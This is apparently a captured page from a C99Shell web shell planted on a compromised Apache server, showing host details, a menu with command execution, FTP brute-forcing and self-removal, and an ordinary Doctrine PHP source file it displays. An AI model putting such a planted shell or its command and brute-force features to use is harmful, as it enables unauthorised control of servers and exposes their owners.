!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/vendor/doctrine/collections/lib/Doctrine/Common/Collections/Expr/   drwxr-xr-x
Free 12.98 GB of 57.97 GB (22.38%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ExpressionVisitor.php (1.45 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Doctrine\Common\Collections\Expr;

use 
RuntimeException;
use function 
get_class;

/**
 * An Expression visitor walks a graph of expressions and turns them into a
 * query for the underlying implementation.
 */
abstract class ExpressionVisitor
{
    
/**
     * Converts a comparison expression into the target query language output.
     *
     * @return mixed
     */
    
abstract public function walkComparison(Comparison $comparison);

    
/**
     * Converts a value expression into the target query language part.
     *
     * @return mixed
     */
    
abstract public function walkValue(Value $value);

    
/**
     * Converts a composite expression into the target query language output.
     *
     * @return mixed
     */
    
abstract public function walkCompositeExpression(CompositeExpression $expr);

    
/**
     * Dispatches walking an expression to the appropriate handler.
     *
     * @return mixed
     *
     * @throws RuntimeException
     */
    
public function dispatch(Expression $expr)
    {
        switch (
true) {
            case 
$expr instanceof Comparison:
                return 
$this->walkComparison($expr);
            case 
$expr instanceof Value:
                return 
$this->walkValue($expr);
            case 
$expr instanceof CompositeExpression:
                return 
$this->walkCompositeExpression($expr);
            default:
                throw new 
RuntimeException('Unknown Expression ' get_class($expr));
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0125 ]--